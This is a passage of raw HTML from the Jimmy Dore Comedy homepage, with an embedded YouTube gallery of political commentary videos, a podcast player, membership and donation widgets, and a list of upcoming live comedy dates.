a{text-decoration:none}.a-icon-checkout{background-position:-58px -35px;height:25px;width:25px}.a-icon-buynow{width:25px;height:25px;background-position:-35px -60px}.a-icon-star-large,.a-icon-star-large-full,.a-icon-star-large-hover{height:35px;width:38px}.a-icon-star-large{background-position:-350px -705px}.a-icon-star-large-full{background-position:-300px -705px}.a-icon-star-large-hover{background-position:-250px -705px}.a-icon.a-icon-heart-hollow-dark,.a-icon.a-icon-heart-hollow-light,.a-icon.a-icon-heart-solid-red{background-image:url(https://m.media-amazon.com/images/G/01/AUIClients/AmazonUIIcon@legacyImages-sprite_heart_desktop_1x-47cb93caf555dd4d64702d0c40e014aedf47b107._V2_.png);-webkit-background-size:26px 78px;background-size:26px 78px}.a-hires .a-icon.a-icon-heart-hollow-dark,.a-hires .a-icon.a-icon-heart-hollow-light,.a-hires .a-icon.a-icon-heart-solid-red{background-image:url(https://m.media-amazon.com/images/G/01/AUIClients/AmazonUIIcon@legacyImages-sprite_heart_desktop_2x-684318a2ed228ea69a25480cd3c659f28c4cff45._V2_.png)}.a-icon-heart-hollow-light{width:26px;height:26px;background-position:0 0}.a-icon-heart-hollow-dark{width:26px;height:26px;background-position:0 -52px}.a-icon-heart-solid-red{width:26px;height:26px;background-position:0 -26px} .a-profile{display:table;text-decoration:none;color:inherit}.a-profile:hover{text-decoration:none}.a-profile-avatar-wrapper{display:table-cell;width:40px;padding-right:10px}.a-profile[data-a-size=small] .a-profile-avatar-wrapper{padding-right:5px;width:40px}.a-profile-avatar{position:relative;height: 40px;width: 36px;}.a-profile-avatar img{border-radius:56px;background-color:#FFF;border:3px solid #FFF;width:100%}[data-a-size=small] .a-profile-avatar{height:34px;width:34px}[data-a-size=small] .a-profile-avatar img{border-radius:34px;border:2px solid #FFF}.a-profile[data-a-type=enthusiast] .a-profile-avatar:after{position:absolute;content:'';display:block;top:auto;bottom:0;left:auto;right:-6px}.a-profile[data-a-size=small] .a-profile-avatar:after{top:auto;bottom:0;left:auto;right:-6px}.a-profile-content{display:table-cell;vertical-align:middle;min-height:56px}.a-profile[data-a-size=small] .a-profile-content{min-height:34px}.a-profile-name{position:relative;color:#111;font-size:17px;line-height:1.255;unicode-bidi:isolate}.a-profile[data-a-descriptor] .a-profile-name,.a-profile[data-a-type] .a-profile-name{margin-right:9px}.a-profile[data-a-size=small] .a-profile-name{font-size:13px;line-height:19px}.a-profile[data-a-size=small][data-a-descriptor] .a-profile-name,.a-profile[data-a-size=small][data-a-type] .a-profile-name{margin-right:8px}.a-profile[data-a-size=base][data-a-descriptor] .a-profile-name,.a-profile[data-a-size=base][data-a-type] .a-profile-name{display:block}.a-profile-verified-badge{display:inline-block;overflow:hidden;vertical-align:baseline;margin-left:8px}.a-profile[data-a-size=small] .a-profile-verified-badge{margin-left:6px}.a-profile-verified-text{position:absolute!important;left:0!important;bottom:-1px!important;z-index:-1!important;opacity:0}.a-profile-descriptor{display:inline-block;color:#6C7778;font-size:12px;line-height:1.5}.a-profile[data-a-type=enthusiast] .a-profile-descriptor{color:#538000}.a-profile[data-a-type=seller] .a-profile-descriptor{color:#A91D67}.a-profile[data-a-size=small] .a-profile-descriptor{font-size:12px;line-height:1.5} </style> <link rel="icon" href="https://upisnvej69-flywheel.netdna-ssl.com/wp-content/uploads/2016/11/cropped-icon-jimmy-dore-32x32.png" sizes="32x32" /> <link rel="icon" href="https://upisnvej69-flywheel.netdna-ssl.com/wp-content/uploads/2016/11/cropped-icon-jimmy-dore-192x192.png" sizes="192x192" /> <link rel="apple-touch-icon-precomposed" href="https://upisnvej69-flywheel.netdna-ssl.com/wp-content/uploads/2016/11/cropped-icon-jimmy-dore-180x180.png" /> <meta name="msapplication-TileImage" content="https://upisnvej69-flywheel.netdna-ssl.com/wp-content/uploads/2016/11/cropped-icon-jimmy-dore-270x270.png" /> </head> <body class="home page-template-default page page-id-2838 pmpro-body-has-access tribe-no-js better-responsive-menu wide"> <div id="page" class="hfeed site"> <header id="masthead" class="site-header clearfix"> <div id="header-text-nav-container" class="clearfix"> <div class="inner-wrap"> <div id="header-text-nav-wrap" class="clearfix"> <div id="header-left-section"> <div id="header-logo-image"> </div><!-- #header-logo-image --> <div id="header-text" class="screen-reader-text"> <h1 id="site-title"> <a href="https://jimmydorecomedy.com/" title="Jimmy Dore Comedy" rel="home">Jimmy Dore Comedy</a> </h1> <p id="site-description">The antidote to the mainstream noise makers, Jimmy Dore’s take-no-prisoners approach fearlessly skewers both political parties and all sides of corporate media.</p> </div><!-- #header-text --> </div><!-- #header-left-section --> <div id="header-right-section"> <div id="header-right-sidebar" class="clearfix"> <aside id="login_logout-2" class="widget widget_login_logout"> <!-- Powered by Login-Logout plugin v.3.8 wordpress.org/plugins/login-logout/ --> <p class="wrap_login_logout"> <span class="item_login"><a href="https://jimmydorecomedy.com/wp-login.php?redirect_to=https%3A%2F%2Fjimmydorecomedy.com%2F">Log in</a></span> | <span class="item_register"><a href="https://jimmydorecomedy.com/wp-login.php?action=register">Become a Premium Member</a></span> </p> </aside> </div> </div><!-- #header-right-section --> </div><!-- #header-text-nav-wrap --> </div><!-- .inner-wrap --> <div id="wp-custom-header" class="wp-custom-header"><div class="header-image-wrap"><div class="inner-wrap"><img src="https://upisnvej69-flywheel.netdna-ssl.com/wp-content/uploads/2017/03/JimmyDoreComedyBanner.png" class="header-image" width="1102" height="151" alt="Jimmy Dore Comedy"></div></div></div> <nav id="site-navigation" class="main-navigation inner-wrap clearfix" role="navigation"> <h3 class="menu-toggle">Menu</h3> <div class="menu-main-menu-container"><ul id="menu-main-menu" class="menu"><li id="menu-item-3327" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-home current-menu-item page_item page-item-2838 current_page_item menu-item-3327"><a href="https://jimmydorecomedy.com/" aria-current="page">Home</a></li> <li id="menu-item-1762" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-1762"><a>Watch</a> <ul class="sub-menu"> <li id="menu-item-45" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-45"><a href="https://jimmydorecomedy.com/watch/">The Jimmy Dore Show</a></li> <li id="menu-item-3004" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-3004"><a href="https://jimmydorecomedy.com/standup/">Comedy Central Stand Up</a></li> </ul> </li> <li id="menu-item-1740" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-1740"><a>Listen</a> <ul class="sub-menu"> <li id="menu-item-2849" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-2849"><a href="https://jimmydorecomedy.com/the-jimmy-dore-show-podcast/">The Jimmy Dore Show Podcast</a></li> <li id="menu-item-2890" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-2890"><a href="https://jimmydorecomedy.com/comedy-and-everything-else/">Comedy And Everything Else</a></li> </ul> </li> <li id="menu-item-92" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-92"><a href="/events/list">Live Shows</a></li> <li id="menu-item-37" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-37"><a href="https://jimmydorecomedy.com/about-jimmy/">About</a></li> <li id="menu-item-30" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-30"><a href="https://jimmydorecomedy.com/contact-us/">Contact</a></li> <li id="menu-item-106" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-106"><a href="https://shop.spreadshirt.com/TJDS">Store</a></li> <li id="menu-item-1781" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-1781"><a>Premium</a> <ul class="sub-menu"> <li id="menu-item-2888" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-2888"><a href="https://jimmydorecomedy.com/premium-podcasts/">Premium Podcasts</a></li> <li id="menu-item-2889" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-2889"><a href="https://jimmydorecomedy.com/premium-videos/">Premium Videos</a></li> <li id="menu-item-1784" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1784"><a href="https://jimmydorecomedy.com/membership-account/">Premium Account</a></li> </ul> </li> </ul></div> </nav> </div><!-- #header-text-nav-container --> <section id="featured-slider"> <div class="slider-cycle inner-wrap"> <div class="slider-rotate"> <div class="slides displayblock"> <figure> <img alt="" src="https://upisnvej69-flywheel.netdna-ssl.com/wp-content/uploads/2017/06/slider3c.jpg"> </figure> <div class="entry-container"> </div> </div> <div class="slides displaynone"> <figure> <img alt="" src="https://upisnvej69-flywheel.netdna-ssl.com/wp-content/uploads/2017/06/slider2c.jpg"> </figure> <div class="entry-container entry-container-left"> </div> </div> <div class="slides displaynone"> <figure> <img alt="" src="https://upisnvej69-flywheel.netdna-ssl.com/wp-content/uploads/2017/06/slider1c.jpg"> </figure> <div class="entry-container entry-container-left"> </div> </div> <div class="slides displaynone"> <figure> <img alt="" src="https://upisnvej69-flywheel.netdna-ssl.com/wp-content/uploads/2017/06/slider4c.jpg"> </figure> <div class="entry-container entry-container-left"> </div> </div> </div> <a class="slide-next" href="#"><i class="fa fa-angle-right"></i></a> <a class="slide-prev" href="#"><i class="fa fa-angle-left"></i></a> </div> <nav id="controllers" class="clearfix"></nav> </section> </header> <div id="main" class="clearfix"> <div class="inner-wrap clearfix"> <div id="primary"> <div id="content" class="clearfix"> <article id="post-2838" class="post-2838 page type-page status-publish hentry pmpro-has-access"> <header class="entry-header"> <h2 class="entry-title">Main</h2> </header> <div class="entry-content clearfix"> <div class="epyt-gallery " data-currpage="1" id="epyt_gallery_95726"><iframe id="_ytid_14514" width="720" height="405" data-origwidth="720" data-origheight="405" src="https://www.youtube.com/embed/d36QXSnSRgM?enablejsapi=1&autoplay=0&cc_load_policy=0&iv_load_policy=3&loop=0&modestbranding=1&rel=0&showinfo=1&fs=1&playsinline=0&autohide=2&theme=light&color=red&controls=2&" class="__youtube_prefs__" title="YouTube player" data-epytgalleryid="epyt_gallery_95726" allow="autoplay; encrypted-media" allowfullscreen data-no-lazy="1" data-skipgform_ajax_framebjll=""></iframe><div class="epyt-gallery-list epyt-gallery-style-grid"><div class="epyt-pagination "><div tabindex="0" role="button" class="epyt-pagebutton epyt-prev hide " data-playlistid="UU3M7l8ved_rYQ45AVzS0RGA" data-pagesize="6" data-pagetoken="" data-style="grid" data-epcolumns="3" data-showtitle="1" data-showpaging="1" data-autonext="0" data-hidethumbimg="0" data-thumbplay="1"><div class="epyt-arrow">&laquo;</div> <div>Prev</div></div><div class="epyt-pagenumbers "><div class="epyt-current">1</div><div class="epyt-pageseparator"> / </div><div class="epyt-totalpages">555</div></div><div tabindex="0" role="button" class="epyt-pagebutton epyt-next" data-playlistid="UU3M7l8ved_rYQ45AVzS0RGA" data-pagesize="6" data-pagetoken="CAYQAA" data-style="grid" data-epcolumns="3" data-showtitle="1" data-showpaging="1" data-autonext="0" data-hidethumbimg="0" data-thumbplay="1"><div>Next</div> <div class="epyt-arrow">&raquo;</div></div><div class="epyt-loader"><img class="lazy lazy-hidden" alt="loading" width="16" height="11" src="//jimmydorecomedy.com/wp-content/plugins/a3-lazy-load/assets/images/lazy_placeholder.gif" data-lazy-type="image" data-src="https://upisnvej69-flywheel.netdna-ssl.com/wp-content/plugins/youtube-embed-plus-pro/images/gallery-page-loader.gif"><noscript><img alt="loading" width="16" height="11" src="https://upisnvej69-flywheel.netdna-ssl.com/wp-content/plugins/youtube-embed-plus-pro/images/gallery-page-loader.gif"></noscript></div></div><div class="epyt-gallery-allthumbs epyt-cols-3 "><div tabindex="0" role="button" data-videoid="d36QXSnSRgM" class="epyt-gallery-thumb " ><div class="epyt-gallery-img-box"><div class="epyt-gallery-img" style="background-image: url(https://i.ytimg.com/vi/d36QXSnSRgM/hqdefault.jpg)"><div class="epyt-gallery-playhover"><img alt="play" class="lazy lazy-hidden epyt-play-img" width="30" height="23" src="//jimmydorecomedy.com/wp-content/plugins/a3-lazy-load/assets/images/lazy_placeholder.gif" data-lazy-type="image" data-src="https://upisnvej69-flywheel.netdna-ssl.com/wp-content/plugins/youtube-embed-plus-pro/images/playhover.png" data-no-lazy="1" data-skipgform_ajax_framebjll="" /><noscript><img alt="play" class="epyt-play-img" width="30" height="23" src="https://upisnvej69-flywheel.netdna-ssl.com/wp-content/plugins/youtube-embed-plus-pro/images/playhover.png" data-no-lazy="1" data-skipgform_ajax_framebjll="" /></noscript><div class="epyt-gallery-playcrutch"></div></div></div></div><div class="epyt-gallery-title">Bogus CNN Poll Favors Biden Exposed!</div></div><div tabindex="0" role="button" data-videoid="fc8k_cq7wh8" class="epyt-gallery-thumb " ><div class="epyt-gallery-img-box"><div class="epyt-gallery-img" style="background-image: url(https://i.ytimg.com/vi/fc8k_cq7wh8/hqdefault.jpg)"><div class="epyt-gallery-playhover"><img alt="play" class="lazy lazy-hidden epyt-play-img" width="30" height="23" src="//jimmydorecomedy.com/wp-content/plugins/a3-lazy-load/assets/images/lazy_placeholder.gif" data-lazy-type="image" data-src="https://upisnvej69-flywheel.netdna-ssl.com/wp-content/plugins/youtube-embed-plus-pro/images/playhover.png" data-no-lazy="1" data-skipgform_ajax_framebjll="" /><noscript><img alt="play" class="epyt-play-img" width="30" height="23" src="https://upisnvej69-flywheel.netdna-ssl.com/wp-content/plugins/youtube-embed-plus-pro/images/playhover.png" data-no-lazy="1" data-skipgform_ajax_framebjll="" /></noscript><div class="epyt-gallery-playcrutch"></div></div></div></div><div class="epyt-gallery-title">Nate Silver Attacks Progressives-Gets Immediately Owned</div></div><div tabindex="0" role="button" data-videoid="OD_RGbHXI8U" class="epyt-gallery-thumb " ><div class="epyt-gallery-img-box"><div class="epyt-gallery-img" style="background-image: url(https://i.ytimg.com/vi/OD_RGbHXI8U/hqdefault.jpg)"><div class="epyt-gallery-playhover"><img alt="play" class="lazy lazy-hidden epyt-play-img" width="30" height="23" src="//jimmydorecomedy.com/wp-content/plugins/a3-lazy-load/assets/images/lazy_placeholder.gif" data-lazy-type="image" data-src="https://upisnvej69-flywheel.netdna-ssl.com/wp-content/plugins/youtube-embed-plus-pro/images/playhover.png" data-no-lazy="1" data-skipgform_ajax_framebjll="" /><noscript><img alt="play" class="epyt-play-img" width="30" height="23" src="https://upisnvej69-flywheel.netdna-ssl.com/wp-content/plugins/youtube-embed-plus-pro/images/playhover.png" data-no-lazy="1" data-skipgform_ajax_framebjll="" /></noscript><div class="epyt-gallery-playcrutch"></div></div></div></div><div class="epyt-gallery-title">Vox Pro-Biden Poll Based On BullS**t</div></div><div class="epyt-gallery-rowbreak"></div><div tabindex="0" role="button" data-videoid="uTGlagIOgcE" class="epyt-gallery-thumb " ><div class="epyt-gallery-img-box"><div class="epyt-gallery-img" style="background-image: url(https://i.ytimg.com/vi/uTGlagIOgcE/hqdefault.jpg)"><div class="epyt-gallery-playhover"><img alt="play" class="lazy lazy-hidden epyt-play-img" width="30" height="23" src="//jimmydorecomedy.com/wp-content/plugins/a3-lazy-load/assets/images/lazy_placeholder.gif" data-lazy-type="image" data-src="https://upisnvej69-flywheel.netdna-ssl.com/wp-content/plugins/youtube-embed-plus-pro/images/playhover.png" data-no-lazy="1" data-skipgform_ajax_framebjll="" /><noscript><img alt="play" class="epyt-play-img" width="30" height="23" src="https://upisnvej69-flywheel.netdna-ssl.com/wp-content/plugins/youtube-embed-plus-pro/images/playhover.png" data-no-lazy="1" data-skipgform_ajax_framebjll="" /></noscript><div class="epyt-gallery-playcrutch"></div></div></div></div><div class="epyt-gallery-title">Maddow Sides With War Criminals On Venezuela</div></div><div tabindex="0" role="button" data-videoid="N-UfJtaKXUw" class="epyt-gallery-thumb " ><div class="epyt-gallery-img-box"><div class="epyt-gallery-img" style="background-image: url(https://i.ytimg.com/vi/N-UfJtaKXUw/hqdefault.jpg)"><div class="epyt-gallery-playhover"><img alt="play" class="lazy lazy-hidden epyt-play-img" width="30" height="23" src="//jimmydorecomedy.com/wp-content/plugins/a3-lazy-load/assets/images/lazy_placeholder.gif" data-lazy-type="image" data-src="https://upisnvej69-flywheel.netdna-ssl.com/wp-content/plugins/youtube-embed-plus-pro/images/playhover.png" data-no-lazy="1" data-skipgform_ajax_framebjll="" /><noscript><img alt="play" class="epyt-play-img" width="30" height="23" src="https://upisnvej69-flywheel.netdna-ssl.com/wp-content/plugins/youtube-embed-plus-pro/images/playhover.png" data-no-lazy="1" data-skipgform_ajax_framebjll="" /></noscript><div class="epyt-gallery-playcrutch"></div></div></div></div><div class="epyt-gallery-title">Biden: “I Like Dick Cheney!”</div></div><div tabindex="0" role="button" data-videoid="B1ukGmVFr4k" class="epyt-gallery-thumb " ><div class="epyt-gallery-img-box"><div class="epyt-gallery-img" style="background-image: url(https://i.ytimg.com/vi/B1ukGmVFr4k/hqdefault.jpg)"><div class="epyt-gallery-playhover"><img alt="play" class="lazy lazy-hidden epyt-play-img" width="30" height="23" src="//jimmydorecomedy.com/wp-content/plugins/a3-lazy-load/assets/images/lazy_placeholder.gif" data-lazy-type="image" data-src="https://upisnvej69-flywheel.netdna-ssl.com/wp-content/plugins/youtube-embed-plus-pro/images/playhover.png" data-no-lazy="1" data-skipgform_ajax_framebjll="" /><noscript><img alt="play" class="epyt-play-img" width="30" height="23" src="https://upisnvej69-flywheel.netdna-ssl.com/wp-content/plugins/youtube-embed-plus-pro/images/playhover.png" data-no-lazy="1" data-skipgform_ajax_framebjll="" /></noscript><div class="epyt-gallery-playcrutch"></div></div></div></div><div class="epyt-gallery-title">Biden FACEPLANTS With Slogan He Stole From Trump</div></div><div class="epyt-gallery-rowbreak"></div><div class="epyt-gallery-clear"></div></div><div class="epyt-pagination "><div tabindex="0" role="button" class="epyt-pagebutton epyt-prev hide " data-playlistid="UU3M7l8ved_rYQ45AVzS0RGA" data-pagesize="6" data-pagetoken="" data-style="grid" data-epcolumns="3" data-showtitle="1" data-showpaging="1" data-autonext="0" data-hidethumbimg="0" data-thumbplay="1"><div class="epyt-arrow">&laquo;</div> <div>Prev</div></div><div class="epyt-pagenumbers "><div class="epyt-current">1</div><div class="epyt-pageseparator"> / </div><div class="epyt-totalpages">555</div></div><div tabindex="0" role="button" class="epyt-pagebutton epyt-next" data-playlistid="UU3M7l8ved_rYQ45AVzS0RGA" data-pagesize="6" data-pagetoken="CAYQAA" data-style="grid" data-epcolumns="3" data-showtitle="1" data-showpaging="1" data-autonext="0" data-hidethumbimg="0" data-thumbplay="1"><div>Next</div> <div class="epyt-arrow">&raquo;</div></div><div class="epyt-loader"><img class="lazy lazy-hidden" alt="loading" width="16" height="11" src="//jimmydorecomedy.com/wp-content/plugins/a3-lazy-load/assets/images/lazy_placeholder.gif" data-lazy-type="image" data-src="https://upisnvej69-flywheel.netdna-ssl.com/wp-content/plugins/youtube-embed-plus-pro/images/gallery-page-loader.gif"><noscript><img alt="loading" width="16" height="11" src="https://upisnvej69-flywheel.netdna-ssl.com/wp-content/plugins/youtube-embed-plus-pro/images/gallery-page-loader.gif"></noscript></div></div></div></div> <hr style="margin-bottom: 35px"/> <iframe class="lazy lazy-hidden" style="border: none" data-lazy-type="iframe" data-src="//html5-player.libsyn.com/embed/destination/id/19459/height/800/width/640/theme/custom/autoplay/no/autonext/no/thumbnail/yes/preload/no/no_addthis/no/direction/backward/no-cache/true/render-playlist/yes/custom-color/1e73be/" height="800" width="100%" scrolling="no" allowfullscreen webkitallowfullscreen mozallowfullscreen oallowfullscreen msallowfullscreen></iframe><noscript><iframe style="border: none" src="//html5-player.libsyn.com/embed/destination/id/19459/height/800/width/640/theme/custom/autoplay/no/autonext/no/thumbnail/yes/preload/no/no_addthis/no/direction/backward/no-cache/true/render-playlist/yes/custom-color/1e73be/" height="800" width="100%" scrolling="no" allowfullscreen webkitallowfullscreen mozallowfullscreen oallowfullscreen msallowfullscreen></iframe></noscript></p> </div> </article> </div><!-- #content --> </div><!-- #primary --> <div id="secondary"> <aside id="text-2" class="widget widget_text"><h3 class="widget-title"><span>Clips From Live Shows</span></h3> <div class="textwidget"><p><a href="/home/index.php/2017/06/17/log-cabin-republicans/"></p> <div> <h6 class="live-clip-title">Log Cabin Republicans</h6> <p><img class="lazy lazy-hidden " src="//jimmydorecomedy.com/wp-content/plugins/a3-lazy-load/assets/images/lazy_placeholder.gif" data-lazy-type="image" data-src="https://img.youtube.com/vi/YeQVbp3mJfg/mqdefault.jpg" /><noscript><img class="" src="https://img.youtube.com/vi/YeQVbp3mJfg/mqdefault.jpg" /></noscript> </div> <p></a></p> <p><a href="/home/index.php/2017/06/17/democrats-we-need-to-get-rid-of/"></p> <div> <h6 class="live-clip-title">Democrats We Need To Get Rid Of!</h6> <p><img class="lazy lazy-hidden " src="//jimmydorecomedy.com/wp-content/plugins/a3-lazy-load/assets/images/lazy_placeholder.gif" data-lazy-type="image" data-src="https://img.youtube.com/vi/aJV_zIUMbH8/mqdefault.jpg" /><noscript><img class="" src="https://img.youtube.com/vi/aJV_zIUMbH8/mqdefault.jpg" /></noscript> </div> <p></a></p> <p><a href="/home/index.php/2017/06/17/fascism/"></p> <div> <h6 class="live-clip-title">Fascism</h6> <p><img class="lazy lazy-hidden " src="//jimmydorecomedy.com/wp-content/plugins/a3-lazy-load/assets/images/lazy_placeholder.gif" data-lazy-type="image" data-src="https://img.youtube.com/vi/9z9NuQGvoXQ/mqdefault.jpg" /><noscript><img class="" src="https://img.youtube.com/vi/9z9NuQGvoXQ/mqdefault.jpg" /></noscript> </div> <p></a></p> <p><a href="/home/index.php/2017/06/17/how-to-screw-uber/"></p> <div> <h6 class="live-clip-title">How To Screw UBER!</h6> <p><img class="lazy lazy-hidden " src="//jimmydorecomedy.com/wp-content/plugins/a3-lazy-load/assets/images/lazy_placeholder.gif" data-lazy-type="image" data-src="https://img.youtube.com/vi/ysGkFOawey8/mqdefault.jpg" /><noscript><img class="" src="https://img.youtube.com/vi/ysGkFOawey8/mqdefault.jpg" /></noscript> </div> <p></a></p> </div> </aside><aside id="nav_menu-2" class="widget widget_nav_menu"><h3 class="widget-title"><span>Premium</span></h3><div class="menu-premium-container"><ul id="menu-premium" class="menu"><li id="menu-item-2858" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-2858"><a href="https://jimmydorecomedy.com/membership-account/membership-levels/">Become a Premium Member</a></li> <li id="menu-item-2884" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-2884"><a href="https://jimmydorecomedy.com/premium-podcasts/">Listen to Premium Podcasts</a></li> <li id="menu-item-2885" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-2885"><a href="https://jimmydorecomedy.com/premium-videos/">Watch Premium Videos</a></li> </ul></div></aside><aside id="text-3" class="widget widget_text"><h3 class="widget-title"><span>Live Shows</span></h3> <div class="textwidget"><p><a href="/events/list/">See dates for upcoming live shows</a></p> </div> </aside><aside id="social-widget-2" class="widget Social_Widget"><h3 class="widget-title"><span>Follow On Social Media</span></h3><div class="socialmedia-buttons smw_left"><a href="https://www.facebook.com/The-Jimmy-Dore-Show-238634954239/" rel="nofollow" target="_blank"><img width="32" height="32" src="//jimmydorecomedy.com/wp-content/plugins/a3-lazy-load/assets/images/lazy_placeholder.gif" data-lazy-type="image" data-src="https://upisnvej69-flywheel.netdna-ssl.com/wp-content/plugins/social-media-widget/images/default/32/facebook.png" alt="Follow Jimmy on Facebook" title="Follow Jimmy on Facebook" style="opacity: 0.8; -moz-opacity: 0.8;" class="lazy lazy-hidden fade" /><noscript><img width="32" height="32" src="https://upisnvej69-flywheel.netdna-ssl.com/wp-content/plugins/social-media-widget/images/default/32/facebook.png" alt="Follow Jimmy on Facebook" title="Follow Jimmy on Facebook" style="opacity: 0.8; -moz-opacity: 0.8;" class="fade" /></noscript></a><a href="https://twitter.com/jimmy_dore" rel="nofollow" target="_blank"><img width="32" height="32" src="//jimmydorecomedy.com/wp-content/plugins/a3-lazy-load/assets/images/lazy_placeholder.gif" data-lazy-type="image" data-src="https://upisnvej69-flywheel.netdna-ssl.com/wp-content/plugins/social-media-widget/images/default/32/twitter.png" alt="Follow Jimmy on Twitter" title="Follow Jimmy on Twitter" style="opacity: 0.8; -moz-opacity: 0.8;" class="lazy lazy-hidden fade" /><noscript><img width="32" height="32" src="https://upisnvej69-flywheel.netdna-ssl.com/wp-content/plugins/social-media-widget/images/default/32/twitter.png" alt="Follow Jimmy on Twitter" title="Follow Jimmy on Twitter" style="opacity: 0.8; -moz-opacity: 0.8;" class="fade" /></noscript></a><a href="https://www.youtube.com/user/TYTComedy" rel="nofollow" target="_blank"><img width="32" height="32" src="//jimmydorecomedy.com/wp-content/plugins/a3-lazy-load/assets/images/lazy_placeholder.gif" data-lazy-type="image" data-src="https://upisnvej69-flywheel.netdna-ssl.com/wp-content/plugins/social-media-widget/images/default/32/youtube.png" alt="Follow Jimmy on YouTube" title="Follow Jimmy on YouTube" style="opacity: 0.8; -moz-opacity: 0.8;" class="lazy lazy-hidden fade" /><noscript><img width="32" height="32" src="https://upisnvej69-flywheel.netdna-ssl.com/wp-content/plugins/social-media-widget/images/default/32/youtube.png" alt="Follow Jimmy on YouTube" title="Follow Jimmy on YouTube" style="opacity: 0.8; -moz-opacity: 0.8;" class="fade" /></noscript></a></div></aside><aside id="media_image-5" class="widget widget_media_image"><h3 class="widget-title"><span>Support The Show</span></h3><a href="https://www.patreon.com/jimmydore" target="_blank"><img width="1680" height="385" src="//jimmydorecomedy.com/wp-content/plugins/a3-lazy-load/assets/images/lazy_placeholder.gif" data-lazy-type="image" data-src="https://upisnvej69-flywheel.netdna-ssl.com/wp-content/uploads/2017/04/patreon.png" class="lazy lazy-hidden image wp-image-2868 alignleft attachment-full size-full" alt="" style="max-width: 100%; height: auto;" srcset="" data-srcset="https://upisnvej69-flywheel.netdna-ssl.com/wp-content/uploads/2017/04/patreon.png 1680w, https://upisnvej69-flywheel.netdna-ssl.com/wp-content/uploads/2017/04/patreon-300x69.png 300w, https://upisnvej69-flywheel.netdna-ssl.com/wp-content/uploads/2017/04/patreon-768x176.png 768w, https://upisnvej69-flywheel.netdna-ssl.com/wp-content/uploads/2017/04/patreon-1024x235.png 1024w" sizes="(max-width: 1680px) 100vw, 1680px" /><noscript><img width="1680" height="385" src="https://upisnvej69-flywheel.netdna-ssl.com/wp-content/uploads/2017/04/patreon.png" class="image wp-image-2868 alignleft attachment-full size-full" alt="" style="max-width: 100%; height: auto;" srcset="https://upisnvej69-flywheel.netdna-ssl.com/wp-content/uploads/2017/04/patreon.png 1680w, https://upisnvej69-flywheel.netdna-ssl.com/wp-content/uploads/2017/04/patreon-300x69.png 300w, https://upisnvej69-flywheel.netdna-ssl.com/wp-content/uploads/2017/04/patreon-768x176.png 768w, https://upisnvej69-flywheel.netdna-ssl.com/wp-content/uploads/2017/04/patreon-1024x235.png 1024w" sizes="(max-width: 1680px) 100vw, 1680px" /></noscript></a></aside><aside id="text-4" class="widget widget_text"><h3 class="widget-title"><span>Support On PayPal</span></h3> <div class="textwidget"><form style="position: relative" action="https://www.paypal.com/cgi-bin/webscr" method="post" target="_top"><input name="cmd" type="hidden" value="_s-xclick" /><br /> <input name="hosted_button_id" type="hidden" value="LK4CCXTRFAZBS" /><br /> <input alt="PayPal - The safer, easier way to pay online!" name="submit" src="https://upisnvej69-flywheel.netdna-ssl.com/wp-content/uploads/2017/08/paypal-donate.jpeg" width="200" style="position: absolute; top: 0;" class="paypal-donate" type="image" /><br /> <img class="lazy lazy-hidden" src="//jimmydorecomedy.com/wp-content/plugins/a3-lazy-load/assets/images/lazy_placeholder.gif" data-lazy-type="image" data-src="https://www.paypalobjects.com/en_US/i/scr/pixel.gif" alt="" width="1" height="1" border="0" /><noscript><img src="https://www.paypalobjects.com/en_US/i/scr/pixel.gif" alt="" width="1" height="1" border="0" /></noscript></form> </div> </aside><aside id="tribe-events-list-widget-2" class="widget tribe-events-list-widget"><h3 class="widget-title"><span>Upcoming Live Shows</span></h3> <ol class="tribe-list-widget"> <li class="tribe-events-list-widget-events type-tribe_events post-3158 tribe-clearfix tribe-events-venue-3160"> <!-- Event Title --> <h4 class="tribe-event-title"> <a href="https://jimmydorecomedy.com/event/may-18th-austin-tx-stateside-at-the-paramount-8pm/" rel="bookmark">May 18th, Austin, TX &#8211; Stateside At The Paramount &#8211; 8pm</a> </h4> <!-- Event Time --> <div class="tribe-event-duration"> <span class="tribe-event-date-start">May 18 @ 8:00 pm</span> - <span class="tribe-event-time">10:00 pm</span> </div> </li> <li class="tribe-events-list-widget-events type-tribe_events post-3354 tribe-clearfix tribe-events-venue-3351"> <!-- Event Title --> <h4 class="tribe-event-title"> <a href="https://jimmydorecomedy.com/event/may-19th-austin-tx-jagoff-comedy-jimmy-dore-friends-the-velveeta-room-7pm-2/" rel="bookmark">May 19th, Austin, TX &#8211; JAGOFF COMEDY Jimmy Dore &#038; Friends, The Velveeta Room &#8211; 7pm</a> </h4> <!-- Event Time --> <div class="tribe-event-duration"> <span class="tribe-event-date-start">May 19 @ 7:00 pm</span> - <span class="tribe-event-time">9:00 pm</span> </div> </li> <li class="tribe-events-list-widget-events type-tribe_events post-3207 tribe-clearfix tribe-events-venue-3210"> <!-- Event Title --> <h4 class="tribe-event-title"> <a href="https://jimmydorecomedy.com/event/june-5th-hermosa-beach-ca-comedy-and-magic-club-7pm/" rel="bookmark">June 5th, Hermosa Beach, CA &#8211; Comedy And Magic Club &#8211; 7pm</a> </h4> <!-- Event Time --> <div class="tribe-event-duration"> <span class="tribe-event-date-start">June 5 @ 7:00 pm</span> - <span class="tribe-event-time">9:30 pm</span> </div> </li> <li class="tribe-events-list-widget-events type-tribe_events post-3186 tribe-clearfix tribe-events-venue-2811"> <!-- Event Title --> <h4 class="tribe-event-title"> <a href="https://jimmydorecomedy.com/event/june-13th-burbank-ca-flappers-comedy-club-730pm/" rel="bookmark">June 13th, Burbank, CA &#8211; JAGOFF COMEDY Flappers Comedy Club &#8211; 7:30pm</a> </h4> <!-- Event Time --> <div 